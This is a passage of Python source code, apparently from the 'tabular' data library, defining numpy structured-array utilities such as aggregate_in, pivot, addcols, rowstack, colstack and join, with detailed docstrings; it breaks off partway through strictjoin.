def strictaggregate(X,On,AggList,returnsort=False, keyfuncdict=None):
if len(On) > 0:
#if len(On) == 1:
# keycols = X[On[0]]
#else:
# keycols = X[On]
keycols = X[On]
if keyfuncdict is not None:
for _kf in keyfuncdict:
fn = keyfuncdict[_kf]
keycols[_kf] = np.array(map(fn, keycols[_kf]))
[D, index_array] = fast.recarrayuniqify(keycols)
X = X[index_array]
Diffs = np.append(np.append([-1], D[1:].nonzero()[0]), [len(D)])
else:
Diffs = np.array([-1, len(X)])
argcounts = dict([(o,
f.func_code.co_argcount - (len(f.func_defaults) if \
f.func_defaults != None else 0) if 'func_code' in dir(f) else 1)
for (o,f,g) in AggList])
OnCols = utils.fromarrays([X[o][Diffs[:-1]+1] for o in On],
type=np.ndarray, names=On)
AggColDict = dict([(o,
[f(X[g][Diffs[i]+1:Diffs[i+1]+1]) if argcounts[o] == 1 else \
f(X[g][Diffs[i]+1:Diffs[i+1]+1],X) for i in range(len(Diffs) - 1)]) \
for (o,f,g) in AggList])
if isinstance(AggColDict[AggList[0][0]][0],list) or \
isinstance(AggColDict[AggList[0][0]][0],np.ndarray):
lens = map(len, AggColDict[AggList[0][0]])
OnCols = OnCols.repeat(lens)
for o in AggColDict.keys():
AggColDict[o] = utils.listunion(AggColDict[o])
Names = [v[0] for v in AggList]
AggCols = utils.fromarrays([AggColDict[o] for o in Names],
type=np.ndarray, names=Names)
if returnsort:
return [colstack([OnCols,AggCols]),index_array]
else:
return colstack([OnCols,AggCols])
def aggregate_in(Data, On=None, AggFuncDict=None, AggFunc=None, AggList=None,
interspersed=True):
"""
Aggregate a ndarray with structured dtype or recarray
and include original data in the result.
Take aggregate of data set on specified columns, then add the resulting
rows back into data set to make a composite object containing both original
non-aggregate data rows as well as the aggregate rows.
First read comments for :func:`tabular.spreadsheet.aggregate`.
This function returns a numpy ndarray, with the number of rows equaling::
len(Data) + len(A)
where `A` is the the result of::
Data.aggregate(On,AggFuncDict)
`A` represents the aggregate rows; the other rows were the original data
rows.
This function supports _multiple_ aggregation, meaning that one can first
aggregate on one set of factors, then repeat aggregation on the result for
another set of factors, without the results of the first aggregation
interfering the second. To achieve this, the method adds two new columns:
* a column called "__aggregates__" specifying on which factors the rows
that are aggregate rows were aggregated. Rows added by aggregating on
factor `A` (a column in the original data set) will have `A` in the
"__aggregates__" column. When multiple factors `A1`, `A2` , ... are
aggregated on, the notation is a comma-separated list: `A1,A2,...`.
This way, when you call `aggregate_in` again, the function only
aggregates on the columns that have the empty char '' in their
"__aggregates__" column.
* a column called '__color__', specifying Gray-Scale colors for
aggregated rows that will be used by the Data Environment system
browser for colorizing the data. When there are multiple levels of
aggregation, the coarser aggregate groups (e.g. on fewer factors) get
darker gray color then those on finer aggregate groups (e.g. more
factors).
Implemented by the tabarray method
:func:`tabular.tab.tabarray.aggregate_in`.
**Parameters**
**Data** : numpy ndarray with structured dtype or recarray
The data set to aggregate in.
**On** : list of strings, optional
List of column names in `X`.
**AggFuncDict** : dictionary, optional
Dictionary where
* keys are some (all) column names of `X` that are NOT in
`On`
* values are functions that can be applied to lists or
numpy arrays.
This specifies how to aggregate the factors _not_ listed in
`On`, e.g. the so-called `Off` columns.
**AggFunc** : function, optional
Function that can be applied to lists or numpy arrays,
specifying how to aggregate factors not listed in either
`On` or the keys of `AggFuncDict`, e.g. a "default"
aggregation function for the `Off` columns not explicitly
listed in `AggFuncDict`.
**interspersed** : boolean, optional
* If `True`, aggregate rows are interleaved with the data
of which they are aggregates.
* If `False`, all aggregate rows placed at the end of the
array.
**Returns**
**agg** : numpy ndarray with structured dtype
Composite aggregated data set plus original data set.
**See also:**
:func:`tabular.spreadsheet.aggregate`
"""
# See if there's an '__aggregates__ column'.
# If so, strip off all those that are nontrivial.
Data = deletecols(Data,'__color__')
if '__aggregates__' in Data.dtype.names:
X = Data[Data['__aggregates__'] == ''][:]
OldAggregates = Data[Data['__aggregates__'] != ''][:]
AggVars = utils.uniqify(utils.listunion([x.split(',') for x in
OldAggregates['__aggregates__']]))
else:
X = Data
OldAggregates = Data[0:0]
AggVars = []
if On == None:
On = []
NewAggregates = aggregate(X, On, AggFuncDict=AggFuncDict,
AggFunc=AggFunc, AggList=AggList, KeepOthers=True)
on = ','.join(On)
NewAggregates = addcols(NewAggregates,
utils.fromarrays([[on]*len(NewAggregates)],
type=np.ndarray, names=['__aggregates__']))
AggVars = utils.uniqify(AggVars + On)
Aggregates = rowstack([OldAggregates,NewAggregates],mode='nulls')
ANLen = np.array([len(x.split(',')) for x in Aggregates['__aggregates__']])
U = np.array(utils.uniqify(ANLen)); U.sort()
[A,B] = fast.equalspairs(ANLen,U)
Grays = np.array(grayspec(len(U)))
AggColor = utils.fromarrays([Grays[A]], type=np.ndarray,
names = ['__color__'])
Aggregates = addcols(Aggregates,AggColor)
if not interspersed or len(AggVars) == 0:
return rowstack([X,Aggregates],mode='nulls')
else:
s = ANLen.argsort()
Aggregates = Aggregates[s[range(len(Aggregates) - 1, -1, -1)]]
X.sort(order = AggVars)
Diffs = np.append(np.append([0], 1 + (X[AggVars][1:] !=
X[AggVars][:-1]).nonzero()[0]), [len(X)])
DiffAtts = ([[t for t in AggVars if X[t][Diffs[i]] != X[t][Diffs[i+1]]]
for i in range(len(Diffs) - 2)]
if len(Diffs) > 2 else []) + [AggVars]
HH = {}
for l in utils.uniqify(Aggregates['__aggregates__']):
Avars = l.split(',')
HH[l] = fast.recarrayequalspairs(X[Avars][Diffs[:-1]],
Aggregates[Avars])
Order = []
for i in range(len(Diffs)-1):
Order.extend(range(Diffs[i], Diffs[i+1]))
Get = []
for l in HH.keys():
Get += [len(X) + j for j in
HH[l][2][range(HH[l][0][i], HH[l][1][i])] if
len(set(DiffAtts[i]).intersection(
Aggregates['__aggregates__'][j].split(','))) > 0 and
set(Aggregates['__aggregates__'][j].split(',')) ==
set(l.split(','))]
Order.extend(Get)
return rowstack([X, Aggregates], mode='nulls')[Order]
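# Editor-added usage sketch (not part of the original module); the column name 'A' is
# hypothetical.
def _example_aggregate_in_usage(Data):
    # Returns the original rows of Data plus interspersed aggregate rows grouped on 'A',
    # tagged via the '__aggregates__' and '__color__' bookkeeping columns described above.
    return aggregate_in(Data, On=['A'], AggFunc=sum)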
def grayspec(k):
"""
List of gray-scale colors in HSV space as web hex triplets.
For integer argument k, returns list of `k` gray-scale colors, increasingly
light, linearly in the HSV color space, as web hex triplets.
Technical dependency of :func:`tabular.spreadsheet.aggregate_in`.
**Parameters**
**k** : positive integer
Number of gray-scale colors to return.
**Returns**
**glist** : list of strings
List of `k` gray-scale colors.
"""
ll = .5
ul = .8
delta = (ul - ll) / k
return [GrayScale(t) for t in np.arange(ll, ul, delta)]
def pivot(X, a, b, Keep=None, NullVals=None, order = None, prefix='_'):
'''
Implements pivoting on numpy ndarrays (with structured dtype) or recarrays.
See http://en.wikipedia.org/wiki/Pivot_table for information about pivot
tables.
Returns `X` pivoted on (a,b) with `a` as the row axis and `b` values as the
column axis.
So-called "nontrivial columns relative to `b`" in `X` are added as
color-grouped sets of columns, and "trivial columns relative to `b`" are
also retained as cross-grouped sets of columns if they are listed in `Keep`
argument.
Note that a column `c` in `X` is "trivial relative to `b`" if for all rows
    i, X[c][i] can be determined from X[b][i], e.g. the elements in X[c] are in
    many-to-one correspondence with the values in X[b].
    The function will raise an exception if the list of pairs of values in
    X[[a,b]] is not the product of the individual columns' values, e.g.::
X[[a,b]] == set(X[a]) x set(X[b])
in some ordering.
Implemented by the tabarray method :func:`tabular.tab.tabarray.pivot`
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The data set to pivot.
**a** : string
Column name in `X`.
**b** : string
Another column name in `X`.
**Keep** : list of strings, optional
List of other columns names in `X`.
**NullVals** : optional
Dictionary mapping column names in `X` other than `a` or
`b` to appropriate null values for their types.
If `None`, then the null values defined by the `nullvalue`
function are used, see
:func:`tabular.spreadsheet.nullvalue`.
**prefix** : string, optional
Prefix to add to `coloring` keys corresponding to
cross-grouped "trivial columns relative to `b`". Default
value is an underscore, '_'.
**Returns**
**ptable** : numpy ndarray with structured dtype
The resulting pivot table.
**coloring** : dictionary
Dictionary whose keys are strings and corresponding values
are lists of column names (e.g. strings).
There are two groups of keys:
* So-called "nontrivial columns relative to `b`" in `X`.
These correspond to columns in::
set(`X.dtype.names`) - set([a, b])
* Cross-grouped "trivial columns relative to `b`". The
`prefix` is used to distinguish these.
The `coloring` parameter is used by the the tabarray pivot
method, :func:`tabular.tab.tabarray.pivot`.
See :func:`tabular.tab.tabarray.__new__` for more
information about coloring.
'''
othernames = [o for o in X.dtype.names if o not in [a,b]]
for c in [a,b]:
assert c in X.dtype.names, 'Column ' + c + ' not found.'
[D,s] = fast.recarrayuniqify(X[[a,b]])
unique_ab = X[[a,b]][s[D.nonzero()[0]]]
assert len(X) == len(unique_ab) , \
('Pairs of values in columns', a, 'and', b, 'must be unique.')
[D,s] = fast.arrayuniqify(X[a])
unique_a = X[a][s[D.nonzero()[0]]]
[D,s] = fast.arrayuniqify(X[b])
unique_b = X[b][s[D.nonzero()[0]]]
Da = len(unique_a)
Db = len(unique_b)
if len(X) != Da * Db:
if list(X.dtype.names).index(a) < list(X.dtype.names).index(b):
n1 = a ; f1 = unique_a; n2 = b ; f2 = unique_b
else:
n1 = b ; f1 = unique_b; n2 = a ; f2 = unique_a
dtype = np.dtype([(n1,f1.dtype.descr[0][1]),(n2,f2.dtype.descr[0][1])])
allvalues = utils.fromarrays([np.repeat(f1,
len(f2)),
np.tile(f2,len(f1))],
np.ndarray,
dtype=dtype)
missingvalues = allvalues[np.invert(fast.recarrayisin(allvalues,
X[[a,b]]))]
if NullVals == None:
NullVals = {}
if not isinstance(NullVals,dict):
if hasattr(NullVals,'__call__'):
NullVals = dict([(o,NullVals(o)) for o in othernames])
else:
NullVals = dict([(o,NullVals) for o in othernames])
nullvals = utils.fromrecords([[NullVals[o] if o in NullVals.keys()
else utils.DEFAULT_NULLVALUE(X[o][0]) for o in
othernames]], type=np.ndarray, names=othernames)
nullarray = nullvals.repeat(len(missingvalues))
Y = colstack([missingvalues, nullarray])
Y = Y.astype(np.dtype([(o,
X.dtype[o].descr[0][1]) for o in Y.dtype.names]))
X = rowstack([X, Y])
X.sort(order = [a,b])
Bvals = X[b][:Db]
bnames = [str(bv).replace(' ','') for bv in Bvals]
assert (len(set(othernames).intersection(bnames)) == 0 and
a not in bnames), ('Processed values of column', b,
            'mustn\'t intersect with other column names.')
acol = X[a][::Db]
Cols = [acol]
names = [a]
Trivials = []
NonTrivials = []
for c in othernames:
Z = X[c].reshape((Da,Db))
if all([len(set(Z[:,i])) == 1 for i in range(Z.shape[1])]):
Trivials.append(c)
else:
NonTrivials.append(c)
Cols += [Z[:,i] for i in range(Z.shape[1])]
names += [bn + '_' + c for bn in bnames]
if order is not None:
        ordering = [names.index(o) for o in order]
Cols = [Cols[i] for i in ordering]
names = [names[i] for i in ordering]
dtype = np.dtype([(n,c.dtype.descr[0][1]) for (n,c) in zip(names,Cols)])
D = utils.fromarrays(Cols,type=np.ndarray,dtype=dtype)
coloring = {}
if Keep != None:
Trivials = set(Trivials).intersection(Keep)
for c in Trivials:
X.sort(order=[c])
cvals = np.array(utils.uniqify(X[c]))
[AA,BB] = fast.equalspairs(cvals,X[c])
for (i,cc) in enumerate(cvals):
blist = [str(bv).replace(' ', '') for bv in Bvals if bv in
X[b][AA[i]:BB[i]]]
coloring[str(cc)] = [a] + [bn + '_' + d for bn in blist for d
in NonTrivials]
for d in NonTrivials:
coloring[str(cc) + '_' + d] = [a] + blist
for c in NonTrivials:
coloring[c] = [a] + [bn + '_' + c for bn in bnames]
for bn in bnames:
coloring[prefix + bn] = [a] + [bn + '_' + c for c in NonTrivials]
return [D, coloring]
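# Editor-added usage sketch (not part of the original module). Column names are
# hypothetical; note that every ('subject', 'condition') pair occurs exactly once, as
# pivot() requires.
def _example_pivot_usage():
    X = utils.fromrecords([('s1', 'c1', 0.1), ('s1', 'c2', 0.2),
                           ('s2', 'c1', 0.3), ('s2', 'c2', 0.4)],
                          type=np.ndarray, names=['subject', 'condition', 'score'])
    # One row per 'subject'; 'score' is spread into 'c1_score' and 'c2_score' columns.
    [ptable, coloring] = pivot(X, 'subject', 'condition')
    return ptable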
def addrecords(X, new):
"""
    Append one or more records to the end of a numpy recarray or ndarray.
Can take a single record, void or tuple, or a list of records, voids or
tuples.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.addrecords`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The array to add records to.
**new** : record, void or tuple, or list of them
Record(s) to add to `X`.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy array made up of `X` plus the new records.
**See also:** :func:`tabular.spreadsheet.rowstack`
"""
if isinstance(new, np.record) or isinstance(new, np.void) or \
isinstance(new, tuple):
new = [new]
return np.append(X, utils.fromrecords(new, type=np.ndarray,
dtype=X.dtype), axis=0)
def addcols(X, cols, names=None):
"""
Add one or more columns to a numpy ndarray.
Technical dependency of :func:`tabular.spreadsheet.aggregate_in`.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.addcols`.
**Parameters**
**X** : numpy ndarray with structured dtype or recarray
The recarray to add columns to.
**cols** : numpy ndarray, or list of arrays of columns
Column(s) to add.
**names**: list of strings, optional
Names of the new columns. Only applicable when `cols` is a
list of arrays.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy array made up of `X` plus the new columns.
**See also:** :func:`tabular.spreadsheet.colstack`
"""
if isinstance(names,str):
names = [n.strip() for n in names.split(',')]
if isinstance(cols, list):
if any([isinstance(x,np.ndarray) or isinstance(x,list) or \
isinstance(x,tuple) for x in cols]):
assert all([len(x) == len(X) for x in cols]), \
'Trying to add columns of wrong length.'
assert names != None and len(cols) == len(names), \
'Number of columns to add must equal number of new names.'
cols = utils.fromarrays(cols,type=np.ndarray,names = names)
else:
assert len(cols) == len(X), 'Trying to add column of wrong length.'
cols = utils.fromarrays([cols], type=np.ndarray,names=names)
else:
assert isinstance(cols, np.ndarray)
if cols.dtype.names == None:
cols = utils.fromarrays([cols],type=np.ndarray, names=names)
Replacements = [a for a in cols.dtype.names if a in X.dtype.names]
if len(Replacements) > 0:
print('Replacing columns',
[a for a in cols.dtype.names if a in X.dtype.names])
return utils.fromarrays(
[X[a] if a not in cols.dtype.names else cols[a] for a in X.dtype.names] +
[cols[a] for a in cols.dtype.names if a not in X.dtype.names],
type=np.ndarray,
names=list(X.dtype.names) + [a for a in cols.dtype.names
if a not in X.dtype.names])
def deletecols(X, cols):
"""
    Delete columns from a numpy ndarray or recarray.
Can take a string giving a column name or comma-separated list of column
names, or a list of string column names.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.deletecols`.
**Parameters**
**X** : numpy recarray or ndarray with structured dtype
The numpy array from which to delete columns.
**cols** : string or list of strings
Name or list of names of columns in `X`. This can be
a string giving a column name or comma-separated list of
column names, or a list of string column names.
**Returns**
**out** : numpy ndarray with structured dtype
New numpy ndarray with structured dtype
given by `X`, excluding the columns named in `cols`.
"""
if isinstance(cols, str):
cols = cols.split(',')
retain = [n for n in X.dtype.names if n not in cols]
if len(retain) > 0:
return X[retain]
else:
return None
def renamecol(X, old, new):
"""
Rename column of a numpy ndarray with structured dtype, in-place.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.renamecol`.
**Parameters**
**X** : numpy ndarray with structured dtype
The numpy array for which a column is to be renamed.
**old** : string
Old column name, e.g. a name in `X.dtype.names`.
**new** : string
New column name to replace `old`.
"""
NewNames = tuple([n if n != old else new for n in X.dtype.names])
X.dtype.names = NewNames
def replace(X, old, new, strict=True, cols=None, rows=None):
"""
Replace value `old` with `new` everywhere it appears in-place.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.replace`.
**Parameters**
**X** : numpy ndarray with structured dtype
Numpy array for which in-place replacement of `old` with
`new` is to be done.
**old** : string
**new** : string
**strict** : boolean, optional
* If `strict` = `True`, replace only exact occurences of `old`.
* If `strict` = `False`, assume `old` and `new` are strings and
replace all occurences of substrings (e.g. like
:func:`str.replace`)
**cols** : list of strings, optional
Names of columns to make replacements in; if `None`, make
replacements everywhere.
**rows** : list of booleans or integers, optional
Rows to make replacements in; if `None`, make replacements
everywhere.
Note: This function does in-place replacements. Thus there are issues
handling data types here when replacement dtype is larger than original
dtype. This can be resolved later by making a new array when necessary ...
"""
if cols == None:
cols = X.dtype.names
elif isinstance(cols, str):
cols = cols.split(',')
if rows == None:
rows = np.ones((len(X),), bool)
if strict:
new = np.array(new)
for a in cols:
if X.dtype[a] < new.dtype:
print('WARNING: dtype of column', a,
'is inferior to dtype of ', new,
'which may cause problems.')
try:
X[a][(X[a] == old)[rows]] = new
except:
print('Replacement not made on column', a, '.')
else:
for a in cols:
QuickRep = True
try:
colstr = ''.join(X[a][rows])
except TypeError:
print('Not replacing in column', a, 'due to type mismatch.')
else:
avoid = [ord(o) for o in utils.uniqify(old + new + colstr)]
ok = set(range(256)).difference(avoid)
if len(ok) > 0:
sep = chr(list(ok)[0])
else:
ok = set(range(65536)).difference(avoid)
if len(ok) > 0:
sep = unichr(list(ok)[0])
else:
                        print('All unicode characters represented in column',
                              a, ', can\'t replace quickly.')
QuickRep = False
if QuickRep:
newrows = np.array(sep.join(X[a][rows])
.replace(old, new).split(sep))
else:
newrows = np.array([aa.replace(old,new) for aa in
X[a][rows]])
X[a][rows] = np.cast[X.dtype[a]](newrows)
if newrows.dtype > X.dtype[a]:
print('WARNING: dtype of column', a, 'is inferior to the '
'dtype of its replacement which may cause problems '
'(ends of strings might get chopped off).')
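# Editor-added usage sketch (not part of the original module); the column name 'city'
# and the values are hypothetical.
def _example_replace_usage(X):
    # In-place, exact replacement of the string 'N/A' by '' in the 'city' column only.
    replace(X, 'N/A', '', strict=True, cols='city')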
def rowstack(seq, mode='nulls', nullvals=None):
'''
Vertically stack a sequence of numpy ndarrays with structured dtype
Analog of numpy.vstack
Implemented by the tabarray method
:func:`tabular.tab.tabarray.rowstack` which uses
:func:`tabular.tabarray.tab_rowstack`.
**Parameters**
**seq** : sequence of numpy recarrays
List, tuple, etc. of numpy recarrays to stack vertically.
**mode** : string in ['nulls', 'commons', 'abort']
Denotes how to proceed if the recarrays have different
dtypes, e.g. different sets of named columns.
* if `mode` == ``nulls``, the resulting set of columns is
determined by the union of the dtypes of all recarrays
to be stacked, and missing data is filled with null
values as defined by
:func:`tabular.spreadsheet.nullvalue`; this is the
default mode.
* elif `mode` == ``commons``, the resulting set of
columns is determined by the intersection of the dtypes
of all recarrays to be stacked, e.g. common columns.
* elif `mode` == ``abort``, raise an error when the
recarrays to stack have different dtypes.
**Returns**
**out** : numpy ndarray with structured dtype
Result of vertically stacking the arrays in `seq`.
**See also:** `numpy.vstack
<http://docs.scipy.org/doc/numpy/reference/generated/numpy.vstack.html>`_.
'''
if nullvals == None:
nullvals = utils.DEFAULT_NULLVALUEFORMAT
#newseq = [ss for ss in seq if len(ss) > 0]
if len(seq) > 1:
assert mode in ['commons','nulls','abort'], \
('"mode" argument must either by "commons", "abort", or "nulls".')
if mode == 'abort':
if not all([set(l.dtype.names) == set(seq[0].dtype.names)
for l in seq]):
raise ValueError('Some column names are different.')
else:
mode = 'commons'
if mode == 'nulls':
names = utils.uniqify(utils.listunion([list(s.dtype.names)
for s in seq if s.dtype.names != None]))
formats = [max([s.dtype[att] for s in seq if s.dtype.names != None
and att in s.dtype.names]).str for att in names]
dtype = np.dtype(zip(names,formats))
return utils.fromarrays([utils.listunion([s[att].tolist()
if (s.dtype.names != None and att in s.dtype.names)
else [nullvals(format)] * len(s) for s in seq])
for (att, format) in zip(names, formats)], type=np.ndarray,
dtype=dtype)
elif mode == 'commons':
names = [x for x in seq[0].dtype.names
if all([x in l.dtype.names for l in seq[1:]])]
formats = [max([a.dtype[att] for a in seq]).str for att in names]
return utils.fromrecords(utils.listunion(
[ar.tolist() for ar in seq]), type=np.ndarray,
names=names, formats=formats)
else:
return seq[0]
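# Editor-added usage sketch (not part of the original module): vertically stack two
# arrays whose dtypes may differ; missing cells are filled with null values.
def _example_rowstack_usage(X, Y):
    return rowstack([X, Y], mode='nulls')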
def colstack(seq, mode='abort',returnnaming=False):
"""
Horizontally stack a sequence of numpy ndarrays with structured dtypes
Analog of numpy.hstack for recarrays.
Implemented by the tabarray method
:func:`tabular.tab.tabarray.colstack` which uses
:func:`tabular.tabarray.tab_colstack`.
**Parameters**
**seq** : sequence of numpy ndarray with structured dtype
List, tuple, etc. of numpy recarrays to stack vertically.
**mode** : string in ['first','drop','abort','rename']
Denotes how to proceed if when multiple recarrays share the
same column name:
* if `mode` == ``first``, take the column from the first
recarray in `seq` containing the shared column name.
* elif `mode` == ``abort``, raise an error when the
recarrays to stack share column names; this is the
default mode.
* elif `mode` == ``drop``, drop any column that shares
its name with any other column among the sequence of
recarrays.
* elif `mode` == ``rename``, for any set of all columns
sharing the same name, rename all columns by appending
an underscore, '_', followed by an integer, starting
with '0' and incrementing by 1 for each subsequent
column.
**Returns**
**out** : numpy ndarray with structured dtype
Result of horizontally stacking the arrays in `seq`.
**See also:** `numpy.hstack
<http://docs.scipy.org/doc/numpy/reference/generated/numpy.hstack.html>`_.
"""
assert mode in ['first','drop','abort','rename'], \
'mode argument must take on value "first","drop", "rename", or "abort".'
AllNames = utils.uniqify(utils.listunion(
[list(l.dtype.names) for l in seq]))
NameList = [(x, [i for i in range(len(seq)) if x in seq[i].dtype.names])
for x in AllNames]
Commons = [x[0] for x in NameList if len(x[1]) > 1]
if len(Commons) > 0 or mode == 'first':
if mode == 'abort':
raise ValueError('There are common column names with differing ' +
'values in the columns')
elif mode == 'drop':
Names = [(L[0], x,x) for (x, L) in NameList if x not in Commons]
elif mode == 'rename':
NameDict = dict(NameList)
Names = utils.listunion([[(i,n,n) if len(NameDict[n]) == 1 else \
(i,n,n + '_' + str(i)) for n in s.dtype.names] \
for (i,s) in enumerate(seq)])
else:
Names = [(L[0], x,x) for (x, L) in NameList]
if returnnaming:
return utils.fromarrays([seq[i][x] for (i, x,y) in Names],
type= np.ndarray,names=zip(*Names)[2]),Names
else:
return utils.fromarrays([seq[i][x] for (i, x,y) in Names],
type= np.ndarray,names=zip(*Names)[2])
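# Editor-added usage sketch (not part of the original module): horizontally stack two
# arrays, renaming any shared column names with an index suffix instead of aborting.
def _example_colstack_usage(X, Y):
    return colstack([X, Y], mode='rename')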
def join(L, keycols=None, nullvals=None, renamer=None,
returnrenaming=False, Names=None):
"""
Combine two or more numpy ndarray with structured dtype on common key
column(s).
Merge a list (or dictionary) of numpy ndarray with structured dtype, given
by `L`, on key columns listed in `keycols`.
This function is actually a wrapper for
:func:`tabular.spreadsheet.strictjoin`.
The ``strictjoin`` function has a few restrictions, and this ``join``
function will try to ensure that they are satisfied:
* each element of `keycol` must be a valid column name in `X`
and each array in `L`, and all of the same data-type.
* for each column `col` in `keycols`, and each array `A` in `L`, the
      values in `A[col]` must be unique -- and the same holds for `X[col]`.
(Actually this uniqueness doesn't have to hold for the first tabarray
in L, that is, L[0], but must for all the subsequent ones.)
* the *non*-key-column column names in each of the arrays must be
disjoint from each other -- or disjoint after a renaming (see below).
An error will be thrown if these conditions are not met.
If you don't provide a value of `keycols`, the algorithm will attempt to
infer which columns should be used by trying to find the largest set of
common column names that contain unique values in each array and have the
same data type. An error will be thrown if no such inference can be made.
*Renaming of overlapping columns*
If the non-keycol column names of the arrays overlap, ``join`` will
by default attempt to rename the columns by using a simple
convention:
* If `L` is a list, it will append the number in the list to the
key associated with the array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the
overlapping columns from that array.
You can override the default renaming scheme using the `renamer`
parameter.
*Nullvalues for keycolumn differences*
If there are regions of the keycolumns that are not overlapping
between merged arrays, `join` will fill in the relevant entries
with null values chosen by default:
* '0' for integer columns
* '0.0' for float columns
* the empty character ('') for string columns.
**Parameters**
**L** : list or dictionary
Numpy recarrays to merge. If `L` is a dictionary, the keys
name each numpy recarray, and the corresponding values are
the actual numpy recarrays.
**keycols** : list of strings
List of the names of the key columns along which to do the
merging.
**nullvals** : function, optional
A function that returns a null value for a numpy format
descriptor string, e.g. ``'<i4'`` or ``'|S5'``.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_NULLVALUEFORMAT`
**renamer** : function, optional
A function for renaming overlapping non-key column names
among the numpy recarrays to merge.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**returnrenaming** : Boolean, optional
Whether to return the result of the `renamer` function.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**Names**: list of strings:
If `L` is a list, than names for elements of `L` can be
specified with `Names` (without losing the ordering as you
would if you did it with a dictionary).
`len(L)` must equal `len(Names)`
**Returns**
**result** : numpy ndarray with structured dtype
Result of the join, e.g. the result of merging the input
numpy arrays defined in `L` on the key columns listed in
`keycols`.
**renaming** : dictionary of dictionaries, optional
The result returned by the `renamer` function. Returned
only if `returnrenaming == True`.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**See Also:**
:func:`tabular.spreadsheet.strictjoin`
"""
if isinstance(L, dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
if not keycols:
keycols = utils.listintersection([a.dtype.names for a in LL])
if len(keycols) == 0:
raise ValueError('No common column names found.')
keycols = [l for l in keycols if all([a.dtype[l] == LL[0].dtype[l]
for a in LL])]
if len(keycols) == 0:
raise ValueError('No suitable common keycolumns, '
'with identical datatypes found.')
keycols = [l for l in keycols if all([isunique(a[keycols])
for a in LL])]
if len(keycols) == 0:
raise ValueError('No suitable common keycolumns, '
'with unique value sets in all arrays to be '
'merged, were found.')
else:
print('Inferring keycols to be:', keycols)
elif isinstance(keycols,str):
keycols = [l.strip() for l in keycols.split(',')]
commons = set(Commons([l.dtype.names for l in LL])).difference(keycols)
renaming = {}
if len(commons) > 0:
        print('common attributes, forcing a renaming ...')
if renamer == None:
print('Using default renamer ...')
renamer = DEFAULT_RENAMER
renaming = renamer(L, Names=Names)
if not RenamingIsInCorrectFormat(renaming, L, Names=Names):
print('Renaming from specified renamer is not in correct format,'
'using default renamer instead ...')
renaming = DEFAULT_RENAMER(L, Names = Names)
NewNames = [[l if l not in renaming[k].keys() else renaming[k][l]
for l in ll.dtype.names] for (k, ll) in zip(Names, LL)]
if set(Commons(NewNames)).difference(keycols):
raise ValueError('Renaming convention failed to produce '
'separated names.')
Result = strictjoin(L, keycols, nullvals, renaming, Names=Names)
if returnrenaming:
return [Result, renaming]
else:
if renaming:
print('There was a nontrivial renaming, to get it set '
'"returnrenaming = True" in keyword to join function.')
return Result
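# Editor-added usage sketch (not part of the original module). The key column 'id' is
# hypothetical; it must exist in both arrays with unique, identically typed values.
def _example_join_usage(left, right):
    return join([left, right], keycols='id')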
def strictjoin(L, keycols, nullvals=None, renaming=None, Names=None):
"""
Combine two or more numpy ndarray with structured dtypes on common key
column(s).
Merge a list (or dictionary) of numpy arrays, given by `L`, on key
columns listed in `keycols`.
The ``strictjoin`` assumes the following restrictions:
* each element of `keycol` must be a valid column name in `X` and each
array in `L`, and all of the same data-type.
* for each column `col` in `keycols`, and each array `A` in `L`, the
      values in `A[col]` must be unique, e.g. no repeats of values -- and the
      same for `X[col]`. (Actually, the uniqueness criterion need not hold
      for the first tabarray in L, but must for all the subsequent ones.)
* the *non*-key-column column names in each of the arrays must be
disjoint from each other -- or disjoint after a renaming (see below).
An error will be thrown if these conditions are not met.
For a wrapper that attempts to meet these restrictions, see
:func:`tabular.spreadsheet.join`.
If you don't provide a value of `keycols`, the algorithm will attempt to
infer which columns should be used by trying to find the largest set of
common column names that contain unique values in each array and have the
same data type. An error will be thrown if no such inference can be made.
*Renaming of overlapping columns*
If the non-keycol column names of the arrays overlap, ``join`` will
by default attempt to rename the columns by using a simple
convention:
* If `L` is a list, it will append the number in the list to the
key associated with the array.
* If `L` is a dictionary, the algorithm will append the string
representation of the key associated with an array to the
overlapping columns from that array.
You can override the default renaming scheme using the `renamer`
parameter.
*Nullvalues for keycolumn differences*
If there are regions of the keycolumns that are not overlapping
between merged arrays, `join` will fill in the relevant entries
with null values chosen by default:
* '0' for integer columns
* '0.0' for float columns
* the empty character ('') for string columns.
**Parameters**
**L** : list or dictionary
Numpy recarrays to merge. If `L` is a dictionary, the keys
name each numpy recarray, and the corresponding values are
the actual numpy recarrays.
**keycols** : list of strings
List of the names of the key columns along which to do the
merging.
**nullvals** : function, optional
A function that returns a null value for a numpy format
descriptor string, e.g. ``'<i4'`` or ``'|S5'``.
See the default function for further documentation:
:func:`tabular.spreadsheet.DEFAULT_NULLVALUEFORMAT`
**renaming** : dictionary of dictionaries, optional
Dictionary mapping each input numpy recarray to a
dictionary mapping each original column name to its new
name following the convention above.
For example, the result returned by:
:func:`tabular.spreadsheet.DEFAULT_RENAMER`
**Returns**
**result** : numpy ndarray with structured dtype
Result of the join, e.g. the result of merging the input
numpy arrays defined in `L` on the key columns listed in
`keycols`.
**See Also:**
:func:`tabular.spreadsheet.join`
"""
if isinstance(L,dict):
Names = L.keys()
LL = L.values()
else:
if Names == None:
Names = range(len(L))
else:
assert len(Names) == len(L)
LL = L
if isinstance(keycols,str):
keycols = [l.strip() for l in keycols.split(',')]
assert all([set(keycols) <= set(l.dtype.names) for l in LL]), \
('keycols,', str(keycols),
', must be valid column names in all arrays being merged.')
assert all([isunique(l[keycols]) for l in LL[1:]]), \
('values in keycol columns,', str(keycols),
', must be unique in all arrays being merged.')
if renaming == None:
renaming = {}
assert RenamingIsInCorrectFormat(renaming, L, Names=Names), \
'renaming is not in proper format ... '
L = dict([(k,ll.copy()) for (k,ll) in zip(Names,LL)])
